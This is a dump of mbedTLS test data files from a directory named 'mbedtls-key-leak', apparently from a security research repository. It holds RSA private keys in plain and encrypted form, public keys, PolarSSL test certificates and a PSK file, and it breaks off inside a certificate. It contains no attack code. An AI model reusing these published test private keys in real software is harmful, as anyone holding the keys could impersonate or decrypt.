/mbedtls-key-leak/mbedtls/tests/data_files/format_gen.key: -------------------------------------------------------------------------------- 1 | -----BEGIN PRIVATE KEY----- 2 | MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMDRSzONESX4mSVT 3 | J69o3x9vQanXcPNviljcwKgkrXkFah6hQUAhW+4jQLxtGb+LU47gE321JGtGNb5L 4 | z1htjLULvc9SAplJ6OOcQUDhyFxI4o6FmUzorv49ytzH6x2IO7UOF44MyJIWGjG3 5 | 4fohS8EQaQjkBYW7kwM/vCVT8Bl9AgMBAAECgYBTqj0cSEi5li41kOh2Z2XxiOAQ 6 | J0h+iNaaCmeaThfrnFrYoZXjktYF9cwANsLmZzlBlJ9Ae5oq5hMp2FFHCHn1z1U/ 7 | BiE3yF2AXNslL0p8lMO4qGxmt2iYdE3Z8comfkyttUJ5k9thLQzU/NWATP8EZGng 8 | iTdEDFOW35cG26ccDQJBAPPoaiveAVN0JYxe2tYR8xb5qta89QGU6HDdTRiClap1 9 | 5rfph5d30MQggqf1tBTiDRKOSk7uN39xwGbMzz11+NcCQQDKYHXWAsN3QlmFQKTX 10 | nm4G5xpl57P9U25wSC+NYOmFEieomD7YlbaBKBc0V5JNj2IqUt0EvXNh3LA5czd9 11 | 3pHLAkAioVgZvF6h07bVFE6r4EaMd4xbCt8ah2LtS2570WagmjbU2/JlfhyFDDyg 12 | zlDwOhwzC0LfrBDzJlpz/hZamppnAkBswjIRdSK+sLWTWw47ojTXGNOi+EZOWcv8 13 | I48Kl45nqT4O6OK9WpfeCUGPK5DAhdHnlOiaZ4Xejc9W0Ih96GLJAkBOzJE8nUU5 14 | giUjLAxJoYepKlWh5tZsNDoGFg46+bHn9l1O6fX7tau0+jEz4tC6aA8R3HtUOrYv 15 | hJ61gH8x3U5J 16 | -----END PRIVATE KEY----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/format_gen.pub: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDA0UszjREl+JklUyevaN8fb0Gp 3 | 13Dzb4pY3MCoJK15BWoeoUFAIVvuI0C8bRm/i1OO4BN9tSRrRjW+S89YbYy1C73P 4 | UgKZSejjnEFA4chcSOKOhZlM6K7+Pcrcx+sdiDu1DheODMiSFhoxt+H6IUvBEGkI 5 | 5AWFu5MDP7wlU/AZfQIDAQAB 6 | -----END PUBLIC KEY----- 7 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/format_pkcs12.fmt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/format_pkcs12.fmt -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/format_rsa.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICWwIBAAKBgQDA0UszjREl+JklUyevaN8fb0Gp13Dzb4pY3MCoJK15BWoeoUFA 3 | IVvuI0C8bRm/i1OO4BN9tSRrRjW+S89YbYy1C73PUgKZSejjnEFA4chcSOKOhZlM 4 | 6K7+Pcrcx+sdiDu1DheODMiSFhoxt+H6IUvBEGkI5AWFu5MDP7wlU/AZfQIDAQAB 5 | AoGAU6o9HEhIuZYuNZDodmdl8YjgECdIfojWmgpnmk4X65xa2KGV45LWBfXMADbC 6 | 5mc5QZSfQHuaKuYTKdhRRwh59c9VPwYhN8hdgFzbJS9KfJTDuKhsZrdomHRN2fHK 7 | Jn5MrbVCeZPbYS0M1PzVgEz/BGRp4Ik3RAxTlt+XBtunHA0CQQDz6Gor3gFTdCWM 8 | XtrWEfMW+arWvPUBlOhw3U0YgpWqdea36YeXd9DEIIKn9bQU4g0SjkpO7jd/ccBm 9 | zM89dfjXAkEAymB11gLDd0JZhUCk155uBucaZeez/VNucEgvjWDphRInqJg+2JW2 10 | gSgXNFeSTY9iKlLdBL1zYdywOXM3fd6RywJAIqFYGbxeodO21RROq+BGjHeMWwrf 11 | Godi7Utue9FmoJo21NvyZX4chQw8oM5Q8DocMwtC36wQ8yZac/4WWpqaZwJAbMIy 12 | EXUivrC1k1sOO6I01xjTovhGTlnL/COPCpeOZ6k+DujivVqX3glBjyuQwIXR55To 13 | mmeF3o3PVtCIfehiyQJATsyRPJ1FOYIlIywMSaGHqSpVoebWbDQ6BhYOOvmx5/Zd 14 | Tun1+7WrtPoxM+LQumgPEdx7VDq2L4SetYB/Md1OSQ== 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/hash_file_1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/hash_file_1 -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/hash_file_2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/hash_file_2 -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/hash_file_3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/hash_file_3 -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/hash_file_4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/hash_file_4 -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/keyfile: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICXgIBAAKBgQDMYfnvWtC8Id5bPKae5yXSxQTt+Zpul6AnnZWfI2TtIarvjHBF 3 | UtXRo96y7hoL4VWOPKGCsRqMFDkrbeUjRrx8iL914/srnyf6sh9c8Zk04xEOpK1y 4 | pvBz+Ks4uZObtjnnitf0NBGdjMKxveTq+VE7BWUIyQjtQ8mbDOsiLLvh7wIDAQAB 5 | AoGAefPIT8MPpAJNjIE/JrfkAMTgsSLrvCurO5gzDBbxhPE+7tsMrsDDpuix3HBo 6 | iEg3ZbzV3obQwV7b0gcr34W4t0CMuJf5b5irHRG8JcZuncmofDy6z7S5Vs75O85z 7 | fVzTIuVUyuHy1rM6rSBYKfsMLVyImUb4wtIXEMHPzdCL9LECQQD3ZfgGqudMWq8v 8 | 3BlKhsQ4fsR0vxzNlMZfoRrZzcvBT339Bp1UQ8aUo8xBtHiRwuW1NaPNgYKX6XQ6 9 | ppuWuTiJAkEA030i493KnFPLRwWypqF/s6ZNlVye+euFN5NF/IeJcvb/GUDRYv9O 10 | pRozRS1jNx4ZB1K2xT7N9MwsPHD6j6K4twJBALdfHTfT9RzjGnae7SAQQ+CcFYFz 11 | JiY6386B2yUVJLFj+j5RaMvMcKQ7xGnvGm7vxtNJrt/j3qg6oavXUfulzgECQQDP 12 | CEVLhCd/+ZeZoz5MWPTGTRrOCKmoRqNW0FlG6PfpD1qSwh04KG44uflO0yu5HUGr 13 | JZG+bcj4x5bWZFMkoUrpAkEAyEgQzesKFqcbt1cqv3pLXJYQBBw6leFXgHk11a7k 14 | +AkexhrPYyq/4tXFO2TLk2hs7tpYgNDOqZCvEu7jtN3RuA== 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/keyfile.3des: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | Proc-Type: 4,ENCRYPTED 3 | DEK-Info: DES-EDE3-CBC,BE8274D6692AF2A7 4 | 5 | 9ZXjoF55A9XgJpdaWmF/ZL1sJfbnE1M42N7HHRDwpq1/K+afC9poM0/AdCUbRL7w 6 | uvQERievbAYpNeLdah1EftM6033e1oTxUMivdL4orDKcbb3qDpSQ0o0UbjavbT+d 7 | aruilW8zVP4dz3mYMvGbkgoujgzdT+4wM0T1mTTuYcRKQsHlg7QDy2QrBILNuXA4 8 | Hmye4GlSXVUSON8vPXT12V4oeubEIZVlnkLTRFGRVA4qz5tby9GBymkeNCBu+LCw 9 | JwJLTbQwMFqozHvioq/2YBaHDcySpTD4X5AwrCjifUNO9BnLWLAmt8dOWr0z+48E 10 | P/yWr5xZl3DrKh9r9EGb9xbTxhum3yHV7bvXLoUH+t9gowmd4Lq3Qjjf8jQXle0P 11 | zoCOVxwN1E1IMhleEUPV7L8mbt26b0JyvrSS5ByrXahGu9vGQyy7qqx9ZANkzgXF 12 | 3hPMDuzQXMJiUeG92VsMEdGdA1/8V5ro+ceB5c7Zca5MjMzvx2tihda7BUjj6dSE 13 | cA8Vvksy/NX/nqHSt0aSgphvBmZP8dN6GMcZ+hT7p0fhCq4mSFEykQqueKXiFUfz 14 | 0xCUVZC6WzOoEkc8k7xiLWQDlsZZ13Z4yxU1IxJp7llZXpZ8GkwS+678/Nx8h54A 15 | mv5ZlSFWWQrvN5JPQJka7aU2ITu1LUK6mXBu+DoSDOfQuqR4vQytkjOqHK185iHs 16 | JQtBGkFFdElkWgubPX/S8/xxoT8MoQY/c+dr6iwcswyUnSJXh32KLPGNBoqWCCbY 17 | jp/VYmeb117gNpEJKJhcNbrP7DoQrC3/D7JFXnOvTA/z6FOtUmz0rQ== 18 | -----END RSA PRIVATE KEY----- 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/keyfile.aes128: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | Proc-Type: 4,ENCRYPTED 3 | DEK-Info: AES-128-CBC,B5FA3F70C2AF79EB9D3DD2C40E7AE61A 4 | 5 | iyfOvvyTPPR7on4XPFxu6CoCgTqh88ROlslM+RLJhwM/qGexbgDOzeI2CPf4XfzI 6 | tyevKD/pqCaCMesYJh/HDQCILdW2tGbwzPajg72xkfCD6+1NHOGoDbdQN8ahGVmg 7 | flAYU0iXDMvqs/jnucM7nlTGp8Istn7+zd9ARyrkQy+I8nvMh3chGKWzx/XtJR+z 8 | Iv8p+n/o+fCHzGvtj+LWYeUc4d0OTIjnF6QPTtPOexX28z0gXRODT/indgifNXv3 9 | j45KO2NYOaVTaCuiWIHj7wWBokoL4bCMFcFTJbdJx5BgfLmDkTEmB/6DEXu6UOsQ 10 | 3lPzyJhIRxn7hNq2I47TzSAFvmcXwm84txpxtSwHTcl9LgsyIiEMmHv3lPPE1G94 11 | F5VrCzzFHyU7nFRdUC0mqLrCHcjDn5O4SQWfH7J/7G4OArU6lA4Z2NC03IPxEmsQ 12 | 66Fu8GdMbmtFORdlZQtOjLi3zZwN9+NwhiUrNNdVvGNJIjIcZ4FZRZysbt7++hfQ 13 | /JOAKhVNC8dNROJUleEYIiqx23e5lze6wqcIosziq3tb6/SQ6fH533D8+PpcZKsC 14 | IlWKAQzsNV+nJvt7CI1ppWc6CtV7TKn0scZm2oOC4339gdR5xzxXe9EJDsMBpcg9 15 | drIdBr+3UxeC6Lc/rWM7IjSQ2YULBra3toEF6UYevngXdUD2YafrpoY5rK9IH90G 16 | Hjbf65IaHLTS0jA7lAvJsQEBuULQQoWENOjhp8v+UfkNM2ccyOuUk3xZJNeX19YP 17 | 1Z09UMEKbf6ucoRCc01SBl206OAsq1NZEaodszT+mDg990I/9ACVi3LEU6XB5ZVs 18 | -----END RSA PRIVATE KEY----- 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/keyfile.aes192: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | Proc-Type: 4,ENCRYPTED 3 | DEK-Info: AES-192-CBC,72F869F41B989D71730B2983448251B8 4 | 5 | R6ST6H9oUyFWBavUO++azbn9ga87lgeuqNMVVScOcXjguqQZdnuZq9AzwQQETEv+ 6 | ZbVPL9w2isuXKoavaPxYyCXbZ+l6JRfWiXi6CmnfNhx4MgYpbH9BEqGbIVxA3fvu 7 | zFutqi+Ru6QeERshDNke6HfFjJ91WkBjNjrXcfDmt0uRGqFSWd5DSEniyaPmxCYs 8 | mpRwr9XESFiBkCHL+/iSkW0EZBjwHW0//RNsZKtuqVJGW/dZhDxerOGRl0a1oWkb 9 | IvfED7afrXMlpHokMwtUduk2TBE1AoczZ6Dv7RZGipaBR4yb9kYgIkiqFk53lg5h 10 | 7b3WQt6TYECI7X3Q2rDgPQtUChVud0uUQYmQ5328HRE8zhlWxHGmTQMWVBW6X+FM 11 | ikFLRUeYBeq0UJu20DmvklZV6iDxsULLu+Rb0b8NkT+V2feSXbrP976oCSUznvT6 12 | 3e2EOH+KAqMy5JZhTsjM7HtkleMwYQ9v+Wnbnn1OsB9drYWUJuhQeXt6v8dkm/eD 13 | 9m6dZzivc/h1UThIuuZPo+6S7FoluIlt5uv2UcnYYdYOgKSd1Vm0wztGaJn3CSGw 14 | JEbebucr+5ptOHxflV5Txgnfj63sJyVd/wy0T8sMRO2znk5uVLWxf855fNXev9M3 15 | gA3+MXC2eGaR9DYOxfakFRwL+Z30RlIktaqDK76BZRD4sWB6dIVw5JdCXpNMCuDH 16 | dxlTKcP59uPAEB2VyhDvm5CN3T+bM2K6WDZFO95hKKfEk5ea/UB7DA2ucfovdayE 17 | Hd46EUKC4/cdUFiSycgD01ztdda7hU7hFvOkHTK7O3G1yvEwH0+jxKNsudNfbbxc 18 | -----END RSA PRIVATE KEY----- 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/keyfile.aes256: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | Proc-Type: 4,ENCRYPTED 3 | DEK-Info: AES-256-CBC,53572EEEE794948AC48CB0E077CE075A 4 | 5 | p0YobpQmzHb3NgGlojpYoH+G5f1XX9snYv2GQe2tGTBQpoHh+ivHcOt85EZu9pC1 6 | 1KRdALEwp7Cb4RYeQncV9Bfp5rItupS1TwfgKAlp7Plmb4vDcDVw+KL3PaYn52Bd 7 | qq5USLxCvKcl91hZXzitttH072lEj2MzW2QpX2/1hCRPgMDu9PJlBX2S+GOaYP+9 8 | sTWTCc1yvHMW4XGEM4P4yfRg9EOTxU5gIYWUE2JqmEGd+9I0hK2YevAPLNKHxzpy 9 | klCCBYqDplcVT5zEyCmdiBHIjzodlFuocZC8ncinVnsuJvpTeMQ+zOZ5rao8xm2j 10 | uCnnVRh7yZktfsf5B/ZKBMGyPYRyKN4CCYhF0GzbehTvBirgDELq4LHyDdnnOTwU 11 | YJiqo17x6S4FVNq6AubADVAbCOMFyfr+TFshI8spOwqfGFFDs8/WWL5OnBS85Pd1 12 | dgoqwzJAt55GyDUbGnp6hUFl9g96nvV3sE6Xe4xVE2Cpf1BtUl9Dt3UrrDrbS0dk 13 | pKxl2FA2H0BVKtfNBHXvWkORi+v+XZl34rZZ37B8snYIN2aOqLuvyM4fd1EabkyG 14 | ymMEUHJcrc5zl/7IECaHrCahqZIsLpLhGTd0MMGrkGSvRLiY5nQ4MN5tKI0fUw0S 15 | 5KIjOA6ZX5nvh4rYgQcgN7K6dXNA2hOj5256Vv0HVwXsVhQFmCGnuo+h8XxudRVH 16 | RuIUaTUtl29a/2nPTzXB6MNZe7Wol8EkzuYEgyaizKr7nO0J1umg+lj7ipX/80Ji 17 | 3ADi0yL4F831LsdAiTY60Lu2e3WABleZsvuLMWSodb9WzJXknsnFEDLGOM+HGj8Q 18 | -----END RSA PRIVATE KEY----- 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/keyfile.des: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | Proc-Type: 4,ENCRYPTED 3 | DEK-Info: DES-CBC,F87FE1C0FB9B3E77 4 | 5 | 1NbOyRx5kBWeXy93eCXyidDpR3pbfgGWIIgXVCVE4/ZXgEt14A23YndZeI5OSxvG 6 | JWhqZ+VuiRsxeKAjo+xf4bnKLArvbshhzUKCEVsCP1d2d1xfgjsnyr8tqNiJE0F6 7 | 7Nimjcrpw/udCk2RBVyshN9kiPBbnA+XUdOHfEnbdkqDsS5DGjq7H1kBZuHhTQa8 8 | Xv6ta3kbI1BGiqKDhH2H9iJlZMwpVQuJs+HqcqNEhsPm0V4kp0S3PZMbYVKpEtDO 9 | vh9CHprQy/nlHfq7ZAs9/2HN4/OT/5kw4JM9qQy7eo/6FX2yh39Lyz8u7PXLaVgM 10 | pwOiFb+zvegYts5aCXyM1nBUu9NFPDQNDytjXOhbWL0hEr1RzgK67f5QYIxWgGCK 11 | St4moIn7J5BifViNdp7j/RXCoCmda3Zv5PiRw83yScSlzgDdTNpm/70jp8pGSxEn 12 | Ib768zYEcYeeKyPar210Nh9abySPpkFFaujN4do5wujboC0VPz73M6eTeZ6iOUgR 13 | cX9WwkfRj6G6VQfM6xAZdOkQ2cj6M4YRze1RKLhqo0+gre76FLn8Kzf/Hjrp/0iy 14 | 0flr/6BwLxGV49vMUCesJ9oqE/frru9Y89cOwbgcHxKJ24Oz+64OUPyeSxDMElZ8 15 | lXiNk3aBEuLdBOKJ8B9kyKuxNqwDoqhCsrc77Gjio+q24w+G2+KAzBEup4S9cYgp 16 | FiSvK8sizKINfE14f9HA60MJJzyEjTUuL7+ioL7xHGtIkdWbs/Qp7KxliH6qoIUv 17 | VUsT6VS1nWLDyTyMbcjMx1odRsWrLwLqIsvNIcGGwe+P4sm4LivNnQ== 18 | -----END RSA PRIVATE KEY----- 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/mpi_10: -------------------------------------------------------------------------------- 1 | label_1234567890=643808006803554439230129854961492699151386107534013432918073439524138264842370630061369715394739134090922937332590384720397133335969549256322620979036686633213903952966175107096769180017646161851573147596390153 2 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/passwd.psk: -------------------------------------------------------------------------------- 1 | Client_identity:6162636465666768696a6b6c6d6e6f70 2 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/pkcs8_pbe_sha1_3des.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/pkcs8_pbe_sha1_3des.der -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/pkcs8_pbes2_pbkdf2_3des.der: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cispa/Security-RISC/7333fe3539085a49108c7fe45b5fcd360a7c9526/mbedtls-key-leak/mbedtls/tests/data_files/pkcs8_pbes2_pbkdf2_3des.der -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/rsa4096_pub.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5F2mqEsdntPAEij6HfCY 3 | nKiLMGnm6PcfsaFYeFYO1EufOjN5ZJP90cr3CrCnN9JOAdpBbTpzA0RcIcAdWBzv 4 | NNAtIMvSfi22WJYVjzD0Bvs2rCYH76Yc6vfx7y9zXZcanh8S/2t7B64xmxOWL4RE 5 | +f8HWTijAWlyUFDk+DuJWpQK2o0bhE4S8mX+uUl3afNW5CiPsRky1N1v4a7/J2b7 6 | cG+7pDWUcjnvmNCN84v+gSucXfKg/LiAnZgY7xih2ePEhkkIqn6kU0cVBQj1cZ7h 7 | XGRaZ/MnqZ2y+KjiuFot2saNk/v0vjjW+xOx76qJV99LtN/1qvCYnO1RqMv2EM8W 8 | hErLcgiRrihzaz3a2GaumL30CcNixrEXRyEjFaO/klqkpuZRHTtyUnkvhUkPUHuH 9 | n45XPxZ7a2XRyrSbFyyS0amTjQwQCveSRiJFjK5TZ56CVGKF/DmuLSHeTY3vwi+W 10 | XVdKMYQ6Zi9jwFJo/S4TRpzp+DTSH68FrFRqE1+qIVyWQjmhWxuvPhqVkG0IT7CZ 11 | 0M8lWesysyI759f5D8DhEp/KbWLDeXWCzcNSbgWGHW5JA+fCV7+8m0PqodIy5D8L 12 | hwm2tI5dA6Qcro8X127RWVaVsN8LIzdf1THXfnZIm1fDBNUfhXapKfnFV8EvALFX 13 | 2Gy8M3kZQ3slaGegILfqRKcCAwEAAQ== 14 | -----END PUBLIC KEY----- 15 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1-nospace.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDhDCCAmygAwIBAgIBHzANBgkqhkiG9w0BAQsFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTQwMzI2MDkyMzEyWhcNMjQwMzIzMDkyMzEyWjA7MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEHBvbGFyc3NsLmV4YW1wbGUwggEiMA0G 6 | CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCpAh89QGrVVVOL/TbugmUuFWFeib+4 7 | 6EWQ2+6IFlLT8UNQR5YSWWSHa/0r4Eb5c77dz5LhkVvtZqBviSl5RYDQg2rVQUN3 8 | Xzl8CQRHgrBXOXDto+wVGR6oMwhHwQVCqf1Mw7Tf3QYfTRBRQGdzEw9A+G2BJV8K 9 | sVPGMH4VOaz5Wu5/kp6mBVvnE5eFtSOS2dQkBtUJJYl1B92mGo8/CRm+rWUsZOuV 10 | m9z+QV4XptpsW2nMAroULBYknErczdD3Umdz8S2gI/1+9DHKLXDKiQsE2y6mT3Bu 11 | ns69WIniU1meblqSZeKIPwyUGaPd5eidlRPtKdurcBLcWsprF6tSglSxAgMBAAGj 12 | gZIwgY8wCQYDVR0TBAIwADAdBgNVHQ4EFgQUH3TWPynBdHRFOwUSLD2ovUNZAqYw 13 | YwYDVR0jBFwwWoAUtFrkpbPe0lL2udWmlQ/rPrzH/f+hP6Q9MDsxCzAJBgNVBAYT 14 | Ak5MMREwDwYDVQQKEwhQb2xhclNTTDEZMBcGA1UEAxMQUG9sYXJTU0wgVGVzdCBD 15 | QYIBADANBgkqhkiG9w0BAQsFAAOCAQEAXs4vQqlIlxrMbE6IwAHLcGJuz17Ru/en 16 | H9bUnnSh1pxa+NHMKZHBG3GT0iaxsVtXf56/tXH4+HL7ntJjrczGN1PbhMGPyt94 17 | 556ZgDxkHT9k7KjPAIs9BrjFHvl9NyIZzcbwkiC0qGvdzjSfe3AiSYuhXI/9/Hog 18 | uUwReH+T2U/ICEHQ5O8aV5nvpgqL3EeEmyx3bu+YXtZMWQUYzX+ya4TnKVPdqwbf 19 | ebr6v1hLXrUFl6rZ3wEJ6MqUW3SGZRkCVNZUOD6Ky3+EiLwYFhuKGdFqSS0JAAD7 20 | ZO3yPu5hu3BhAQYavK4Yyfi9IQmubBqxopPwyzjG1HPw2lj+oapH0w== 21 | -----END CERTIFICATE----- 22 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1-v1.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDITCCAgkCDFOitscEzU2OvIALwTANBgkqhkiG9w0BAQsFADBQMRwwGgYDVQQD 3 | ExNQb2xhclNTTCBUZXN0IENBIHYxMRAwDgYDVQQLEwd0ZXN0aW5nMREwDwYDVQQK 4 | EwhQb2xhclNTTDELMAkGA1UEBhMCTkwwIhgPMjAxNDA2MTkxMDA5MTFaGA8yMDI0 5 | MDYxODEwMDkxMVowTjEaMBgGA1UEAxMRc2VydmVyMS9pbnQtY2EtdjExEDAOBgNV 6 | BAsTB3Rlc3RpbmcxETAPBgNVBAoTCFBvbGFyU1NMMQswCQYDVQQGEwJOTDCCASIw 7 | DQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6J 8 | v7joRZDb7ogWUtPxQ1BHlhJZZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVB 9 | Q3dfOXwJBEeCsFc5cO2j7BUZHqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYEl 10 | XwqxU8YwfhU5rPla7n+SnqYFW+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk 11 | 65Wb3P5BXhem2mxbacwCuhQsFiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZP 12 | cG6ezr1YieJTWZ5uWpJl4og/DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEA 13 | ATANBgkqhkiG9w0BAQsFAAOCAQEAPJl3fbVeTJ6gVAvCoLYM8JY5U7ZhrCCdBghw 14 | WuZBS/TWwf4WLP0G/ZtTyTOENcT0gWHf0/VnXtNPw2/yBjWsLtTXxN2XQlEVf3j/ 15 | WcQxWgSESYdx/sT/uTW6qihuONPWkTQizmx7OG6vBuGx3g54s9/oeJKXOraNqud3 16 | G4KBrytOazliMfoKO2hnzaeydpaDtb2tZX8apN/6KqQpTAcXsWrZRW9XEHWq2sNz 17 | IR1nIE1F/9gnqi9Xy0HQprteLRUvM4tEQ35m4H20eS5Y9gJlE/DqXmMQ7aiU8DgP 18 | krj+Z18pcrssO+Etv0BOiPjmU9TWWpDMj34ef7U/OH5qJxkSrA== 19 | -----END CERTIFICATE----- 20 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.cert_type.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDUjCCAjqgAwIBAgIBATANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTEwMjEyMTQ0NDA2WhcNMjEwMjEyMTQ0NDA2WjA8MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxGjAYBgNVBAMTEVBvbGFyU1NMIFNlcnZlciAxMIIBIjAN 6 | BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqQIfPUBq1VVTi/027oJlLhVhXom/ 7 | uOhFkNvuiBZS0/FDUEeWEllkh2v9K+BG+XO+3c+S4ZFb7Wagb4kpeUWA0INq1UFD 8 | d185fAkER4KwVzlw7aPsFRkeqDMIR8EFQqn9TMO0390GH00QUUBncxMPQPhtgSVf 9 | CrFTxjB+FTms+Vruf5KepgVb5xOXhbUjktnUJAbVCSWJdQfdphqPPwkZvq1lLGTr 10 | lZvc/kFeF6babFtpzAK6FCwWJJxK3M3Q91Jnc/EtoCP9fvQxyi1wyokLBNsupk9w 11 | bp7OvViJ4lNZnm5akmXiiD8MlBmj3eXonZUT7Snbq3AS3FrKaxerUoJUsQIDAQAB 12 | o2AwXjAJBgNVHRMEAjAAMB0GA1UdDgQWBBQfdNY/KcF0dEU7BRIsPai9Q1kCpjAf 13 | BgNVHSMEGDAWgBS0WuSls97SUva51aaVD+s+vMf9/zARBglghkgBhvhCAQEEBAMC 14 | AEAwDQYJKoZIhvcNAQEFBQADggEBAJ28VuktjDGkUWcVpM/W+YjohFDay676Yozx 15 | BbBLU3QZiDkcdXZbX/jOaKKBGWrjWiB6txchV4XrlvEtVtPgPrQLil2xaD20LOqJ 16 | e/ZEFIAIndf06CAcimdQaPD6mww04v3gZw3cwPQd/aMQCw9tm93tyf6YU4uIh/o8 17 | evG1ZBrNHRyiW18kbuueLNZ2daYQIISRJSIFrAERacfOvA8r7yXJCqZnB6AU5j9u 18 | V+ySNW3sdZIOTfs1nWKU6SECWo72dd89Yvs7wCf3NSZNM2UemLeOjQOmZIHBiR8L 19 | PAhDxhra5B/QBKaWeTVQohEvKz75pLAWouUGIKlgHiqJ4cvBGcg= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDPzCCAiegAwIBAgIBATANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTEwMjEyMTQ0NDA2WhcNMjEwMjEyMTQ0NDA2WjA8MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxGjAYBgNVBAMTEVBvbGFyU1NMIFNlcnZlciAxMIIBIjAN 6 | BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqQIfPUBq1VVTi/027oJlLhVhXom/ 7 | uOhFkNvuiBZS0/FDUEeWEllkh2v9K+BG+XO+3c+S4ZFb7Wagb4kpeUWA0INq1UFD 8 | d185fAkER4KwVzlw7aPsFRkeqDMIR8EFQqn9TMO0390GH00QUUBncxMPQPhtgSVf 9 | CrFTxjB+FTms+Vruf5KepgVb5xOXhbUjktnUJAbVCSWJdQfdphqPPwkZvq1lLGTr 10 | lZvc/kFeF6babFtpzAK6FCwWJJxK3M3Q91Jnc/EtoCP9fvQxyi1wyokLBNsupk9w 11 | bp7OvViJ4lNZnm5akmXiiD8MlBmj3eXonZUT7Snbq3AS3FrKaxerUoJUsQIDAQAB 12 | 